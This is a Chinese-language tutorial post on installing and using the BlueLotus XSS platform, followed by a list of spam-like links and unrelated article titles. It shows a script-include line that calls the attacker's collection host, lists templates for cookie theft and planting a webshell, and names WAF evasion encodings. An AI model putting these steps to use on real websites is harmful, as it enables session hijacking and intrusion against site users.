当前位置: 首页 > news >正文

BlueLotus XSS管理后台使用指南

目录

一、BlueLotus简介

二、系统安装与配置

1. 安装步骤

三、后台登录

四、核心功能使用

1. 我的JS

2. 公共模版

3. XSS接收面板

五、防御规避策略


一、BlueLotus简介

BlueLotus(蓝莲花)是一款功能强大的XSS漏洞测试与管理平台,它提供了一个集中化的管理后台,可以帮助安全研究人员高效地管理和利用XSS漏洞。

图1:BlueLotus平台界面

二、系统安装与配置

1. 安装步骤

  1. 下载BlueLotus最新版本

  2. 解压到Web服务器目录

  3. 访问安装向导页面

  4. 按照提示完成数据库配置

三、后台登录

访问后台登录地址(通常为http://192.168.21.4/BlueLotus/login.php),输入管理员账号密码。

图2:后台登录界面

四、核心功能使用

1. 我的JS

发现XSS漏洞后,可以在"漏洞管理"中添加记录:

  1. 点击"新增"

  2. 选择插入模版

  3. 生成payload

  4. 复制js内容

<script src="http://192.168.21.4/BlueLotus/myjs/alert.js"></script>

图3:JS可进行编码

2. 公共模版

BlueLotus提供了多种预置的XSS攻击载荷:

  1. 弹框测试

  2. Cookie窃取

  3. 网站截屏

  4. 写一句话木马

图4:公共模版界面

3. XSS接收面板

在左侧菜单点击"项目管理"→"添加项目",填写项目信息:

  • 接收时间

  • 接收IP

  • 客户端

  • 携带数据

将构造的JS,插入存在xss漏洞的网站

图5:收到的接收cookie信息

五、防御规避策略

对抗WAF技巧,内置绕过方案:

  1. HTML标签变异(<svg/onload=>

  2. 编码混淆(JSFuck/AAEncode)

  3. 分块传输编码


文章转载自:
http://basicity.zekgq.cn
http://brunizem.zekgq.cn
http://censer.zekgq.cn
http://algebraist.zekgq.cn
http://carpenter.zekgq.cn
http://asportation.zekgq.cn
http://acidophil.zekgq.cn
http://bugseed.zekgq.cn
http://appertain.zekgq.cn
http://bored.zekgq.cn
http://antiworld.zekgq.cn
http://antirust.zekgq.cn
http://breugel.zekgq.cn
http://assassinator.zekgq.cn
http://boiler.zekgq.cn
http://cadency.zekgq.cn
http://caffre.zekgq.cn
http://calpack.zekgq.cn
http://chordate.zekgq.cn
http://astrophotography.zekgq.cn
http://bef.zekgq.cn
http://autecism.zekgq.cn
http://aesthophysiology.zekgq.cn
http://acaudal.zekgq.cn
http://ammocete.zekgq.cn
http://article.zekgq.cn
http://ace.zekgq.cn
http://abomasum.zekgq.cn
http://athenaeum.zekgq.cn
http://arthrosis.zekgq.cn
http://www.dtcms.com/a/280378.html

相关文章:

  • GeoTools 工厂设计模式
  • 传输协议和消息队列
  • AR眼镜:重塑医学教育,开启智能教学新时代
  • 同步辐射XAFS和XRD协同用于高熵合金的研究应用
  • 香港站群服务器租用:为什么需要选择不同C类IP?
  • python的广东省家庭旅游接待信息管理系统
  • k8s之Attach 和 Mount
  • C++回顾 Day7
  • k8s之Snapshots 详解
  • Linux C IO多路复用
  • 静态补丁脚本 - 修改 libtolua.so
  • Unity音游开发全指南:模板与免费资源高效构建节奏游戏
  • Ubuntu 22.04 安装 mysql-server服务端
  • docker拉取nacos镜像失败
  • golang语法-----标准化输入输出
  • 渗透测试技术_Nessus工具(三):输出报告
  • 构建 Go 可执行文件镜像 | 探索轻量级 Docker 基础镜像(我应该选择哪个 Docker 镜像?)
  • STM32小实验三--让蜂鸣器响起来
  • Pytorch中张量的索引和切片使用详解和代码示例
  • CSS的初步学习
  • 用语音识别芯片驱动TFT屏幕还有链接蓝牙功能?
  • cursor使用mcp连接mysql数据库,url方式
  • java截取视频帧
  • c#进阶之数据结构(字符串篇)----String
  • C++中list各种基本接口的模拟实现
  • 【Java代码审计(2)】MyBatis XML 注入审计
  • 153.在 Vue 3 中使用 OpenLayers + Cesium 实现 2D/3D 地图切换效果
  • java中的接口
  • JavaScript 动态访问嵌套对象属性问题记录
  • HarmonyOS-ArkUI: Web组件加载流程1